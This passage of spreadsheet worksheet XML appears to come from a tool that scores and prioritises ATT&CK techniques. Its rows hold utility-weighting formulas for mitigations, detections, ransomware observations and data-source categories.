        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W583" s="37">
        <v>0</v>
      </c>
      <c r="X583" s="37">
        <v>0</v>
      </c>
      <c r="Y583" s="37">
        <v>0</v>
      </c>
      <c r="Z583" s="37">
        <v>0</v>
      </c>
      <c r="AA583" s="37">
        <v>0</v>
      </c>
      <c r="AB583" s="37">
        <v>0</v>
      </c>
      <c r="AC583" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD583" s="50"/>
      <c r="AE583" s="37" t="str" cm="1">
        <f t="array" ref="AE583">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD583)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF583" s="37">
        <v>579</v>
      </c>
      <c r="AG583" s="37" t="str" cm="1">
        <f t="array" ref="AG583">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD583)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH583" s="37">
        <v>579</v>
      </c>
      <c r="AI583" s="37" t="str" cm="1">
        <f t="array" ref="AI583">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD583)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ583" s="37">
        <v>579</v>
      </c>
      <c r="AK583" s="37" t="str" cm="1">
        <f t="array" ref="AK583">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD583)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL583" s="37">
        <v>579</v>
      </c>
      <c r="AM583" s="37" t="str" cm="1">
        <f t="array" ref="AM583">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD583)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN583" s="37">
        <v>0</v>
      </c>
      <c r="AO583" s="37">
        <v>0</v>
      </c>
      <c r="AP583" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ583" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.616666666666667</v>
      </c>
      <c r="AR583" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS583" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT583" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU58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84" spans="1:47" ht="34">
      <c r="A584" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B584" s="37">
        <f t="shared" si="9"/>
        <v>116.05000000000001</v>
      </c>
      <c r="C584" s="37" t="s">
        <v>1918</v>
      </c>
      <c r="D584" s="50" t="s">
        <v>1917</v>
      </c>
      <c r="E584" s="37" t="s">
        <v>1919</v>
      </c>
      <c r="F584" s="37">
        <v>0</v>
      </c>
      <c r="G584" s="37">
        <v>1</v>
      </c>
      <c r="H584" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I584" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J584" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K584" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L584" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M584" s="37">
        <v>0</v>
      </c>
      <c r="N584" s="56">
        <v>0</v>
      </c>
      <c r="O584" s="56">
        <v>0</v>
      </c>
      <c r="P584" s="56">
        <v>0</v>
      </c>
      <c r="Q584" s="56">
        <v>0</v>
      </c>
      <c r="R584" s="57"/>
      <c r="S584" s="57">
        <v>0</v>
      </c>
      <c r="T584" s="57"/>
      <c r="U584" s="57">
        <v>0</v>
      </c>
      <c r="V584" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W584" s="37">
        <v>0</v>
      </c>
      <c r="X584" s="37">
        <v>0</v>
      </c>
      <c r="Y584" s="37">
        <v>0</v>
      </c>
      <c r="Z584" s="37">
        <v>0</v>
      </c>
      <c r="AA584" s="37">
        <v>0</v>
      </c>
      <c r="AB584" s="37">
        <v>0</v>
      </c>
      <c r="AC584" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD584" s="50"/>
      <c r="AE584" s="37" t="str" cm="1">
        <f t="array" ref="AE584">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD584)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF584" s="37">
        <v>580</v>
      </c>
      <c r="AG584" s="37" t="str" cm="1">
        <f t="array" ref="AG584">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD584)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH584" s="37">
        <v>580</v>
      </c>
      <c r="AI584" s="37" t="str" cm="1">
        <f t="array" ref="AI584">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD584)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ584" s="37">
        <v>580</v>
      </c>
      <c r="AK584" s="37" t="str" cm="1">
        <f t="array" ref="AK584">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD584)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL584" s="37">
        <v>580</v>
      </c>
      <c r="AM584" s="37" t="str" cm="1">
        <f t="array" ref="AM584">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD584)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN584" s="37">
        <v>0</v>
      </c>
      <c r="AO584" s="37">
        <v>0</v>
      </c>
      <c r="AP584" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ584" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.683333333333337</v>
      </c>
      <c r="AR584" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS584" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT584" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU58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85" spans="1:47" ht="34">
      <c r="A585" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B585" s="37">
        <f t="shared" si="9"/>
        <v>116.25</v>
      </c>
      <c r="C585" s="37" t="s">
        <v>1920</v>
      </c>
      <c r="D585" s="50" t="s">
        <v>1917</v>
      </c>
      <c r="E585" s="37" t="s">
        <v>1921</v>
      </c>
      <c r="F585" s="37">
        <v>0</v>
      </c>
      <c r="G585" s="37">
        <v>1</v>
      </c>
      <c r="H585" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I585" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J585" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K585" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L585" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M585" s="37">
        <v>0</v>
      </c>
      <c r="N585" s="56">
        <v>0</v>
      </c>
      <c r="O585" s="56">
        <v>0</v>
      </c>
      <c r="P585" s="56">
        <v>0</v>
      </c>
      <c r="Q585" s="56">
        <v>0</v>
      </c>
      <c r="R585" s="57"/>
      <c r="S585" s="57">
        <v>0</v>
      </c>
      <c r="T585" s="57"/>
      <c r="U585" s="57">
        <v>0</v>
      </c>
      <c r="V585" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W585" s="37">
        <v>0</v>
      </c>
      <c r="X585" s="37">
        <v>0</v>
      </c>
      <c r="Y585" s="37">
        <v>0</v>
      </c>
      <c r="Z585" s="37">
        <v>0</v>
      </c>
      <c r="AA585" s="37">
        <v>0</v>
      </c>
      <c r="AB585" s="37">
        <v>0</v>
      </c>
      <c r="AC585" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD585" s="50"/>
      <c r="AE585" s="37" t="str" cm="1">
        <f t="array" ref="AE585">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD585)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF585" s="37">
        <v>581</v>
      </c>
      <c r="AG585" s="37" t="str" cm="1">
        <f t="array" ref="AG585">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD585)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH585" s="37">
        <v>581</v>
      </c>
      <c r="AI585" s="37" t="str" cm="1">
        <f t="array" ref="AI585">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD585)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ585" s="37">
        <v>581</v>
      </c>
      <c r="AK585" s="37" t="str" cm="1">
        <f t="array" ref="AK585">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD585)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL585" s="37">
        <v>581</v>
      </c>
      <c r="AM585" s="37" t="str" cm="1">
        <f t="array" ref="AM585">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD585)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN585" s="37">
        <v>0</v>
      </c>
      <c r="AO585" s="37">
        <v>0</v>
      </c>
      <c r="AP585" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ585" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.75</v>
      </c>
      <c r="AR585" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS585" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT585" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU58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86" spans="1:47" ht="34">
      <c r="A586" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B586" s="37">
        <f t="shared" si="9"/>
        <v>116.45</v>
      </c>
      <c r="C586" s="37" t="s">
        <v>1922</v>
      </c>
      <c r="D586" s="50" t="s">
        <v>1917</v>
      </c>
      <c r="E586" s="37" t="s">
        <v>1844</v>
      </c>
      <c r="F586" s="37">
        <v>0</v>
      </c>
      <c r="G586" s="37">
        <v>1</v>
      </c>
      <c r="H586" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I586" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J586" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K586" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L586" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M586" s="37">
        <v>0</v>
      </c>
      <c r="N586" s="56">
        <v>0</v>
      </c>
      <c r="O586" s="56">
        <v>0</v>
      </c>
      <c r="P586" s="56">
        <v>0</v>
      </c>
      <c r="Q586" s="56">
        <v>0</v>
      </c>
      <c r="R586" s="57"/>
      <c r="S586" s="57">
        <v>0</v>
      </c>
      <c r="T586" s="57"/>
      <c r="U586" s="57">
        <v>0</v>
      </c>
      <c r="V586" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W586" s="37">
        <v>0</v>
      </c>
      <c r="X586" s="37">
        <v>0</v>
      </c>
      <c r="Y586" s="37">
        <v>0</v>
      </c>
      <c r="Z586" s="37">
        <v>0</v>
      </c>
      <c r="AA586" s="37">
        <v>0</v>
      </c>
      <c r="AB586" s="37">
        <v>0</v>
      </c>
      <c r="AC586" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD586" s="50"/>
      <c r="AE586" s="37" t="str" cm="1">
        <f t="array" ref="AE586">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD586)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF586" s="37">
        <v>582</v>
      </c>
      <c r="AG586" s="37" t="str" cm="1">
        <f t="array" ref="AG586">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD586)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH586" s="37">
        <v>582</v>
      </c>
      <c r="AI586" s="37" t="str" cm="1">
        <f t="array" ref="AI586">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD586)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ586" s="37">
        <v>582</v>
      </c>
      <c r="AK586" s="37" t="str" cm="1">
        <f t="array" ref="AK586">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD586)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL586" s="37">
        <v>582</v>
      </c>
      <c r="AM586" s="37" t="str" cm="1">
        <f t="array" ref="AM586">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD586)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN586" s="37">
        <v>0</v>
      </c>
      <c r="AO586" s="37">
        <v>0</v>
      </c>
      <c r="AP586" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ586" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.81666666666667</v>
      </c>
      <c r="AR586" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS586" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT586" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU58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87" spans="1:47" ht="34">
      <c r="A587" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B587" s="37">
        <f t="shared" si="9"/>
        <v>116.65</v>
      </c>
      <c r="C587" s="37" t="s">
        <v>1923</v>
      </c>
      <c r="D587" s="50" t="s">
        <v>1917</v>
      </c>
      <c r="E587" s="37" t="s">
        <v>1924</v>
      </c>
      <c r="F587" s="37">
        <v>0</v>
      </c>
      <c r="G587" s="37">
        <v>1</v>
      </c>
      <c r="H587" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I587" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J587" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K587" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L587" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M587" s="37">
        <v>0</v>
      </c>
      <c r="N587" s="56">
        <v>0</v>
      </c>
      <c r="O587" s="56">
        <v>0</v>
      </c>
      <c r="P587" s="56">
        <v>0</v>
      </c>
      <c r="Q587" s="56">
        <v>0</v>
      </c>
      <c r="R587" s="57"/>
      <c r="S587" s="57">
        <v>0</v>
      </c>
      <c r="T587" s="57"/>
      <c r="U587" s="57">
        <v>0</v>
      </c>
      <c r="V587" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W587" s="37">
        <v>0</v>
      </c>
      <c r="X587" s="37">
        <v>0</v>
      </c>
      <c r="Y587" s="37">
        <v>0</v>
      </c>
      <c r="Z587" s="37">
        <v>0</v>
      </c>
      <c r="AA587" s="37">
        <v>0</v>
      </c>
      <c r="AB587" s="37">
        <v>0</v>
      </c>
      <c r="AC587" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD587" s="50"/>
      <c r="AE587" s="37" t="str" cm="1">
        <f t="array" ref="AE587">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD587)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF587" s="37">
        <v>583</v>
      </c>
      <c r="AG587" s="37" t="str" cm="1">
        <f t="array" ref="AG587">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD587)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH587" s="37">
        <v>583</v>
      </c>
      <c r="AI587" s="37" t="str" cm="1">
        <f t="array" ref="AI587">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD587)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ587" s="37">
        <v>583</v>
      </c>
      <c r="AK587" s="37" t="str" cm="1">
        <f t="array" ref="AK587">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD587)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL587" s="37">
        <v>583</v>
      </c>
      <c r="AM587" s="37" t="str" cm="1">
        <f t="array" ref="AM587">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD587)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN587" s="37">
        <v>0</v>
      </c>
      <c r="AO587" s="37">
        <v>0</v>
      </c>
      <c r="AP587" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ587" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.883333333333333</v>
      </c>
      <c r="AR587" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS587" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT587" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU58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88" spans="1:47" ht="34">
      <c r="A588" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B588" s="37">
        <f t="shared" si="9"/>
        <v>116.85000000000001</v>
      </c>
      <c r="C588" s="37" t="s">
        <v>1925</v>
      </c>
      <c r="D588" s="50" t="s">
        <v>1917</v>
      </c>
      <c r="E588" s="37" t="s">
        <v>1926</v>
      </c>
      <c r="F588" s="37">
        <v>0</v>
      </c>
      <c r="G588" s="37">
        <v>1</v>
      </c>
      <c r="H588" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I588" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J588" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K588" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L588" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M588" s="37">
        <v>0</v>
      </c>
      <c r="N588" s="56">
        <v>0</v>
      </c>
      <c r="O588" s="56">
        <v>0</v>
      </c>
      <c r="P588" s="56">
        <v>0</v>
      </c>
      <c r="Q588" s="56">
        <v>0</v>
      </c>
      <c r="R588" s="57"/>
      <c r="S588" s="57">
        <v>0</v>
      </c>
      <c r="T588" s="57"/>
      <c r="U588" s="57">
        <v>0</v>
      </c>
      <c r="V588" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W588" s="37">
        <v>0</v>
      </c>
      <c r="X588" s="37">
        <v>0</v>
      </c>
      <c r="Y588" s="37">
        <v>0</v>
      </c>
      <c r="Z588" s="37">
        <v>0</v>
      </c>
      <c r="AA588" s="37">
        <v>0</v>
      </c>
      <c r="AB588" s="37">
        <v>0</v>
      </c>
      <c r="AC588" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD588" s="50"/>
      <c r="AE588" s="37" t="str" cm="1">
        <f t="array" ref="AE588">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD588)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF588" s="37">
        <v>584</v>
      </c>
      <c r="AG588" s="37" t="str" cm="1">
        <f t="array" ref="AG588">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD588)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH588" s="37">
        <v>584</v>
      </c>
      <c r="AI588" s="37" t="str" cm="1">
        <f t="array" ref="AI588">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD588)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ588" s="37">
        <v>584</v>
      </c>
      <c r="AK588" s="37" t="str" cm="1">
        <f t="array" ref="AK588">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD588)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL588" s="37">
        <v>584</v>
      </c>
      <c r="AM588" s="37" t="str" cm="1">
